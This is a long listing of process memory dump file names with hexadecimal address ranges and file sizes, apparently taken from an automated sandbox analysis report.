memory/1996-924-0x0000000000000000-mapping.dmp
-
memory/1996-922-0x0000000000000000-mapping.dmp
-
memory/1996-920-0x0000000000000000-mapping.dmp
-
memory/1996-1076-0x0000000000000000-mapping.dmp
-
memory/1996-917-0x0000000000000000-mapping.dmp
-
memory/1996-915-0x0000000000000000-mapping.dmp
-
memory/1996-913-0x0000000000000000-mapping.dmp
-
memory/1996-911-0x0000000000000000-mapping.dmp
-
memory/1996-909-0x0000000000000000-mapping.dmp
-
memory/1996-907-0x0000000000000000-mapping.dmp
-
memory/1996-905-0x0000000000000000-mapping.dmp
-
memory/1996-903-0x0000000000000000-mapping.dmp
-
memory/1996-901-0x0000000000000000-mapping.dmp
-
memory/1996-899-0x0000000000000000-mapping.dmp
-
memory/1996-897-0x0000000000000000-mapping.dmp
-
memory/1996-895-0x0000000000000000-mapping.dmp
-
memory/1996-851-0x0000000000000000-mapping.dmp
-
memory/1996-1097-0x0000000000000000-mapping.dmp
-
memory/1996-891-0x0000000000000000-mapping.dmp
-
memory/1996-855-0x0000000000000000-mapping.dmp
-
memory/1996-858-0x0000000000000000-mapping.dmp
-
memory/1996-886-0x0000000000000000-mapping.dmp
-
memory/1996-882-0x0000000000000000-mapping.dmp
-
memory/1996-1094-0x0000000000000000-mapping.dmp
-
memory/1996-878-0x0000000000000000-mapping.dmp
-
memory/1996-874-0x0000000000000000-mapping.dmp
-
memory/1996-869-0x0000000000000000-mapping.dmp
-
memory/1996-863-0x0000000000000000-mapping.dmp
-
memory/2008-24-0x0000000000000000-mapping.dmp
-
memory/2072-421-0x0000000000000000-mapping.dmp
-
memory/2100-69-0x0000000000000000-mapping.dmp
-
memory/2100-70-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/2244-549-0x0000000000000000-mapping.dmp
-
memory/2244-558-0x0000000004A20000-0x0000000004B21000-memory.dmpFilesize
1.0MB
-
memory/2244-555-0x0000000004920000-0x0000000004921000-memory.dmpFilesize
4KB
-
memory/2260-1119-0x0000000000000000-mapping.dmp
-
memory/2332-351-0x0000000009000000-0x00000000090BA000-memory.dmpFilesize
744KB
-
memory/2332-121-0x00000000091F0000-0x00000000091F1000-memory.dmpFilesize
4KB
-
memory/2332-123-0x0000000008D40000-0x0000000008D54000-memory.dmpFilesize
80KB
-
memory/2332-120-0x0000000005840000-0x0000000005841000-memory.dmpFilesize
4KB
-
memory/2332-119-0x0000000005790000-0x0000000005791000-memory.dmpFilesize
4KB
-
memory/2332-103-0x0000000000000000-mapping.dmp
-
memory/2332-108-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/2332-352-0x0000000009720000-0x0000000009721000-memory.dmpFilesize
4KB
-
memory/2332-113-0x0000000000EB0000-0x0000000000EB1000-memory.dmpFilesize
4KB
-
memory/2388-28-0x0000000000000000-mapping.dmp
-
memory/2436-812-0x0000000000000000-mapping.dmp
-
memory/2808-767-0x0000000000000000-mapping.dmp
-
memory/2872-327-0x0000000000000000-mapping.dmp
-
memory/2872-335-0x00007FFF44F20000-0x00007FFF4590C000-memory.dmpFilesize
9.9MB
-
memory/2920-1117-0x0000000000000000-mapping.dmp
-
memory/3132-304-0x0000000000000000-mapping.dmp
-
memory/3132-310-0x00007FFF44F20000-0x00007FFF4590C000-memory.dmpFilesize
9.9MB
-
memory/3224-2-0x0000000000000000-mapping.dmp
-
memory/3224-3-0x0000000000000000-mapping.dmp
-
memory/3236-205-0x0000000000770000-0x0000000000771000-memory.dmpFilesize
4KB
-
memory/3236-204-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/3236-223-0x0000000005580000-0x0000000005596000-memory.dmpFilesize
88KB
-
memory/3236-222-0x00000000053C0000-0x00000000053FD000-memory.dmpFilesize
244KB
-
memory/3236-200-0x0000000000000000-mapping.dmp
-
memory/3408-994-0x00007FFF46310000-0x00007FFF46CFC000-memory.dmpFilesize
9.9MB
-
memory/3408-981-0x0000000000000000-mapping.dmp
-
memory/3464-7-0x0000000000000000-mapping.dmp
-
memory/3488-0-0x0000000000000000-mapping.dmp
-
memory/3508-239-0x0000000000000000-mapping.dmp
-
memory/3508-258-0x0000000004E70000-0x0000000004E71000-memory.dmpFilesize
4KB
-
memory/3528-519-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/3528-515-0x000000000040C76E-mapping.dmp
-
memory/3540-126-0x0000000000000000-mapping.dmp
-
memory/3548-951-0x0000000000000000-mapping.dmp
-
memory/3548-960-0x00007FFF46310000-0x00007FFF46CFC000-memory.dmpFilesize
9.9MB
-
memory/3552-61-0x0000000000000000-mapping.dmp
-
memory/3552-66-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/3560-1004-0x00007FFF46310000-0x00007FFF46CFC000-memory.dmpFilesize
9.9MB
-
memory/3560-992-0x0000000000000000-mapping.dmp
-
memory/3564-530-0x000000000040616E-mapping.dmp
-
memory/3564-533-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/3596-538-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/3596-535-0x0000000000403BEE-mapping.dmp
-
memory/3604-58-0x0000000000000000-mapping.dmp
-
memory/3740-888-0x000000000040DDD4-mapping.dmp
-
memory/3740-890-0x0000000000400000-0x0000000000418000-memory.dmpFilesize
96KB
-
memory/3740-887-0x0000000000400000-0x0000000000418000-memory.dmpFilesize
96KB
-
memory/3908-1108-0x0000000000000000-mapping.dmp
-
memory/3948-212-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/3948-240-0x0000000005B60000-0x0000000005B9C000-memory.dmpFilesize
240KB
-
memory/3948-206-0x0000000000000000-mapping.dmp
-
memory/3948-215-0x0000000000E70000-0x0000000000E71000-memory.dmpFilesize
4KB
-
memory/3956-219-0x0000000000000000-mapping.dmp
-
memory/4040-419-0x0000000000000000-mapping.dmp
-
memory/4040-424-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/4064-314-0x00007FFF44F20000-0x00007FFF4590C000-memory.dmpFilesize
9.9MB
-
memory/4064-308-0x0000000000000000-mapping.dmp
-
memory/4156-9-0x0000000000000000-mapping.dmp
-
memory/4188-288-0x00007FFF44F20000-0x00007FFF4590C000-memory.dmpFilesize
9.9MB
-
memory/4188-289-0x00000237795B0000-0x00000237795B1000-memory.dmpFilesize
4KB
-
memory/4188-300-0x0000023779760000-0x0000023779761000-memory.dmpFilesize
4KB
-
memory/4188-285-0x0000000000000000-mapping.dmp
-
memory/4232-156-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4232-154-0x000000000041A684-mapping.dmp
-
memory/4232-153-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4260-136-0x0000000000000000-mapping.dmp
-
memory/4364-872-0x000001CBD4820000-0x000001CBD4821000-memory.dmpFilesize
4KB
-
memory/4364-787-0x0000000000000000-mapping.dmp
-
memory/4364-800-0x00007FFF46310000-0x00007FFF46CFC000-memory.dmpFilesize
9.9MB
-
memory/4364-866-0x000001CBD4800000-0x000001CBD4801000-memory.dmpFilesize
4KB
-
memory/4364-893-0x000001CBECEC0000-0x000001CBECEC1000-memory.dmpFilesize
4KB
-
memory/4428-184-0x0000000004370000-0x0000000004371000-memory.dmpFilesize
4KB
-
memory/4428-183-0x0000000004370000-0x0000000004371000-memory.dmpFilesize
4KB
-
memory/4432-10-0x0000000000000000-mapping.dmp
-
memory/4452-79-0x0000000008AD0000-0x0000000008AD1000-memory.dmpFilesize
4KB
-
memory/4452-25-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/4452-23-0x0000000000000000-mapping.dmp
-
memory/4452-77-0x0000000009520000-0x0000000009521000-memory.dmpFilesize
4KB
-
memory/4496-1106-0x000000000040DDD4-mapping.dmp
-
memory/4504-282-0x00007FFF44F20000-0x00007FFF4590C000-memory.dmpFilesize
9.9MB
-
memory/4504-830-0x0000000000000000-mapping.dmp
-
memory/4504-278-0x0000000000000000-mapping.dmp
-
memory/4504-277-0x0000000000000000-mapping.dmp
-
memory/4504-283-0x0000000000400000-0x0000000000401000-memory.dmpFilesize
4KB
-
memory/4544-180-0x0000000000000000-mapping.dmp
-
memory/4548-29-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/4548-45-0x0000000007FC0000-0x0000000007FC1000-memory.dmpFilesize
4KB
-
memory/4548-26-0x0000000000000000-mapping.dmp
-
memory/4552-339-0x00007FFF44F20000-0x00007FFF4590C000-memory.dmpFilesize
9.9MB
-
memory/4552-331-0x0000000000000000-mapping.dmp
-
memory/4560-989-0x00007FFF46310000-0x00007FFF46CFC000-memory.dmpFilesize
9.9MB
-
memory/4560-975-0x0000000000000000-mapping.dmp
-
memory/4580-227-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4580-229-0x000000000040C76E-mapping.dmp
-
memory/4580-232-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/4592-230-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/4592-225-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/4592-226-0x000000000040616E-mapping.dmp
-
memory/4620-287-0x00000000041C0000-0x000000000421C000-memory.dmpFilesize
368KB
-
memory/4620-881-0x0000000050480000-0x000000005049A000-memory.dmpFilesize
104KB
-
memory/4620-438-0x0000000004C20000-0x0000000004C71000-memory.dmpFilesize
324KB
-
memory/4620-197-0x0000000000000000-mapping.dmp
-
memory/4624-313-0x0000000000000000-mapping.dmp
-
memory/4624-326-0x00007FFF44F20000-0x00007FFF4590C000-memory.dmpFilesize
9.9MB
-
memory/4640-186-0x0000000004B10000-0x0000000004B11000-memory.dmpFilesize
4KB
-
memory/4684-65-0x0000000000000000-mapping.dmp
-
memory/4780-143-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/4780-148-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/4780-146-0x000000000043FA56-mapping.dmp
-
memory/4784-302-0x0000000000000000-mapping.dmp
-
memory/4784-306-0x00007FFF44F20000-0x00007FFF4590C000-memory.dmpFilesize
9.9MB
-
memory/4808-713-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/4808-705-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/4808-708-0x0000000000417A8B-mapping.dmp
-
memory/4912-1074-0x0000000000000000-mapping.dmp
-
memory/4912-1084-0x00007FFF46310000-0x00007FFF46CFC000-memory.dmpFilesize
9.9MB
-
memory/4928-150-0x0000000000417A8B-mapping.dmp
-
memory/4928-149-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/4928-152-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/4980-724-0x0000000000000000-mapping.dmp
-
memory/5288-362-0x0000000000760000-0x0000000000761000-memory.dmpFilesize
4KB
-
memory/5288-358-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/5288-354-0x0000000000000000-mapping.dmp
-
memory/5288-580-0x0000000008330000-0x0000000008377000-memory.dmpFilesize
284KB
-
memory/5304-361-0x0000000000400000-0x0000000000493000-memory.dmpFilesize
588KB
-
memory/5304-356-0x0000000000400000-0x0000000000493000-memory.dmpFilesize
588KB
-
memory/5304-359-0x000000000043FA56-mapping.dmp
-
memory/5396-642-0x0000000000000000-mapping.dmp
-
memory/5396-452-0x0000000000000000-mapping.dmp
-
memory/5396-622-0x0000000000000000-mapping.dmp
-
memory/5396-619-0x0000000000000000-mapping.dmp
-
memory/5396-870-0x0000000000000000-mapping.dmp
-
memory/5396-859-0x0000000000000000-mapping.dmp
-
memory/5396-615-0x0000000000000000-mapping.dmp
-
memory/5396-875-0x0000000000000000-mapping.dmp
-
memory/5396-613-0x0000000000000000-mapping.dmp
-
memory/5396-879-0x0000000000000000-mapping.dmp
-
memory/5396-609-0x0000000000000000-mapping.dmp
-
memory/5396-625-0x0000000000000000-mapping.dmp
-
memory/5396-883-0x0000000007950000-0x0000000007951000-memory.dmpFilesize
4KB
-
memory/5396-885-0x0000000000000000-mapping.dmp
-
memory/5396-606-0x0000000000000000-mapping.dmp
-
memory/5396-603-0x0000000000000000-mapping.dmp
-
memory/5396-601-0x0000000000000000-mapping.dmp
-
memory/5396-599-0x0000000000000000-mapping.dmp
-
memory/5396-854-0x0000000000000000-mapping.dmp
-
memory/5396-597-0x0000000000000000-mapping.dmp
-
memory/5396-595-0x0000000000000000-mapping.dmp
-
memory/5396-593-0x0000000000000000-mapping.dmp
-
memory/5396-591-0x0000000000000000-mapping.dmp
-
memory/5396-589-0x0000000000000000-mapping.dmp
-
memory/5396-587-0x0000000000000000-mapping.dmp
-
memory/5396-585-0x0000000000000000-mapping.dmp
-
memory/5396-583-0x0000000000000000-mapping.dmp
-
memory/5396-628-0x0000000000000000-mapping.dmp
-
memory/5396-579-0x0000000000000000-mapping.dmp
-
memory/5396-577-0x0000000000000000-mapping.dmp
-
memory/5396-575-0x0000000000000000-mapping.dmp
-
memory/5396-573-0x0000000000000000-mapping.dmp
-
memory/5396-570-0x0000000000000000-mapping.dmp
-
memory/5396-567-0x0000000000000000-mapping.dmp
-
memory/5396-564-0x0000000000000000-mapping.dmp
-
memory/5396-734-0x0000000000000000-mapping.dmp
-
memory/5396-561-0x0000000000000000-mapping.dmp
-
memory/5396-556-0x0000000000000000-mapping.dmp
-
memory/5396-553-0x0000000000000000-mapping.dmp
-
memory/5396-550-0x0000000000000000-mapping.dmp
-
memory/5396-730-0x0000000000000000-mapping.dmp
-
memory/5396-543-0x0000000000000000-mapping.dmp
-
memory/5396-536-0x0000000000000000-mapping.dmp
-
memory/5396-529-0x0000000000000000-mapping.dmp
-
memory/5396-523-0x0000000000000000-mapping.dmp
-
memory/5396-516-0x0000000000000000-mapping.dmp
-
memory/5396-742-0x0000000000000000-mapping.dmp
-
memory/5396-512-0x0000000000000000-mapping.dmp
-
memory/5396-509-0x0000000000000000-mapping.dmp
-
memory/5396-507-0x0000000000000000-mapping.dmp
-
memory/5396-504-0x0000000000000000-mapping.dmp
-
memory/5396-502-0x0000000000000000-mapping.dmp
-
memory/5396-500-0x0000000000000000-mapping.dmp
-
memory/5396-498-0x0000000000000000-mapping.dmp
-
memory/5396-496-0x0000000000000000-mapping.dmp
-
memory/5396-494-0x0000000000000000-mapping.dmp
-
memory/5396-492-0x0000000000000000-mapping.dmp
-
memory/5396-746-0x0000000000000000-mapping.dmp
-
memory/5396-490-0x0000000000000000-mapping.dmp
-
memory/5396-488-0x0000000000000000-mapping.dmp
-
memory/5396-486-0x0000000000000000-mapping.dmp
-
memory/5396-484-0x0000000000000000-mapping.dmp
-
memory/5396-482-0x0000000000000000-mapping.dmp
-
memory/5396-480-0x0000000000000000-mapping.dmp
-
memory/5396-478-0x0000000000000000-mapping.dmp
-
memory/5396-850-0x0000000000000000-mapping.dmp
-
memory/5396-476-0x0000000000000000-mapping.dmp
-
memory/5396-474-0x0000000000000000-mapping.dmp
-
memory/5396-472-0x0000000000000000-mapping.dmp
-
memory/5396-470-0x0000000000000000-mapping.dmp
-
memory/5396-468-0x0000000000000000-mapping.dmp
-
memory/5396-462-0x0000000000000000-mapping.dmp
-
memory/5396-464-0x0000000000000000-mapping.dmp
-
memory/5396-466-0x0000000000000000-mapping.dmp
-
memory/5396-460-0x0000000000000000-mapping.dmp
-
memory/5396-865-0x0000000000000000-mapping.dmp
-
memory/5396-726-0x0000000000000000-mapping.dmp
-
memory/5396-454-0x0000000000000000-mapping.dmp
-
memory/5396-458-0x0000000000000000-mapping.dmp
-
memory/5396-456-0x0000000000000000-mapping.dmp
-
memory/5396-749-0x0000000000000000-mapping.dmp
-
memory/5396-450-0x0000000000000000-mapping.dmp
-
memory/5396-448-0x0000000000000000-mapping.dmp
-
memory/5396-446-0x0000000000000000-mapping.dmp
-
memory/5396-445-0x0000000003390000-0x0000000003391000-memory.dmpFilesize
4KB
-
memory/5396-444-0x0000000000000000-mapping.dmp
-
memory/5396-443-0x00000000032D0000-0x00000000032D1000-memory.dmpFilesize
4KB
-
memory/5396-756-0x0000000000000000-mapping.dmp
-
memory/5396-846-0x0000000000000000-mapping.dmp
-
memory/5396-720-0x0000000000000000-mapping.dmp
-
memory/5396-716-0x0000000000000000-mapping.dmp
-
memory/5396-709-0x0000000000000000-mapping.dmp
-
memory/5396-703-0x0000000000000000-mapping.dmp
-
memory/5396-764-0x0000000000000000-mapping.dmp
-
memory/5396-630-0x0000000000000000-mapping.dmp
-
memory/5396-633-0x0000000000000000-mapping.dmp
-
memory/5396-699-0x0000000000000000-mapping.dmp
-
memory/5396-841-0x0000000000000000-mapping.dmp
-
memory/5396-771-0x0000000000000000-mapping.dmp
-
memory/5396-837-0x0000000000000000-mapping.dmp
-
memory/5396-738-0x0000000000000000-mapping.dmp
-
memory/5396-833-0x0000000000000000-mapping.dmp
-
memory/5396-828-0x0000000000000000-mapping.dmp
-
memory/5396-694-0x0000000000000000-mapping.dmp
-
memory/5396-776-0x0000000000000000-mapping.dmp
-
memory/5396-824-0x0000000000000000-mapping.dmp
-
memory/5396-648-0x0000000000000000-mapping.dmp
-
memory/5396-652-0x0000000000000000-mapping.dmp
-
memory/5396-818-0x0000000000000000-mapping.dmp
-
memory/5396-689-0x0000000000000000-mapping.dmp
-
memory/5396-655-0x0000000000000000-mapping.dmp
-
memory/5396-813-0x0000000000000000-mapping.dmp
-
memory/5396-658-0x0000000000000000-mapping.dmp
-
memory/5396-668-0x0000000000000000-mapping.dmp
-
memory/5396-671-0x0000000000000000-mapping.dmp
-
memory/5396-808-0x0000000000000000-mapping.dmp
-
memory/5396-674-0x0000000000000000-mapping.dmp
-
memory/5396-804-0x0000000000000000-mapping.dmp
-
memory/5396-799-0x0000000000000000-mapping.dmp
-
memory/5396-685-0x0000000000000000-mapping.dmp
-
memory/5396-795-0x0000000000000000-mapping.dmp
-
memory/5396-678-0x0000000000000000-mapping.dmp
-
memory/5396-680-0x0000000000000000-mapping.dmp
-
memory/5396-791-0x0000000000000000-mapping.dmp
-
memory/5396-786-0x0000000000000000-mapping.dmp
-
memory/5396-682-0x0000000000000000-mapping.dmp
-
memory/5396-781-0x0000000000000000-mapping.dmp
-
memory/5568-766-0x00007FFF46310000-0x00007FFF46CFC000-memory.dmpFilesize
9.9MB
-
memory/5568-758-0x0000000000000000-mapping.dmp
-
memory/5568-761-0x0000000000000000-mapping.dmp
-
memory/5624-942-0x0000000000000000-mapping.dmp
-
memory/5640-964-0x0000000000000000-mapping.dmp
-
memory/5664-1110-0x0000000000000000-mapping.dmp
-
memory/5688-1009-0x00007FFF46310000-0x00007FFF46CFC000-memory.dmpFilesize
9.9MB
-
memory/5688-996-0x0000000000000000-mapping.dmp
-
memory/5728-1129-0x0000000000000000-mapping.dmp
-
memory/5824-1057-0x00007FFF46310000-0x00007FFF46CFC000-memory.dmpFilesize
9.9MB
-
memory/5824-1046-0x0000000000000000-mapping.dmp
-
memory/5904-631-0x0000000000000000-mapping.dmp
-
memory/5904-646-0x00000000000D0000-0x00000000000D1000-memory.dmpFilesize
4KB
-
memory/5904-637-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/5904-693-0x0000000000820000-0x0000000000879000-memory.dmpFilesize
356KB
-
memory/5960-638-0x0000000008900000-0x0000000008901000-memory.dmpFilesize
4KB
-
memory/5960-548-0x0000000000000000-mapping.dmp
-
memory/5960-563-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/6000-402-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB
-
memory/6000-399-0x0000000000000000-mapping.dmp
-
memory/6060-408-0x0000000000000000-mapping.dmp
-
memory/6060-675-0x0000000004BB0000-0x0000000004C01000-memory.dmpFilesize
324KB
-
memory/6092-411-0x0000000000000000-mapping.dmp
-
memory/6092-414-0x000000006FF10000-0x00000000705FE000-memory.dmpFilesize
6.9MB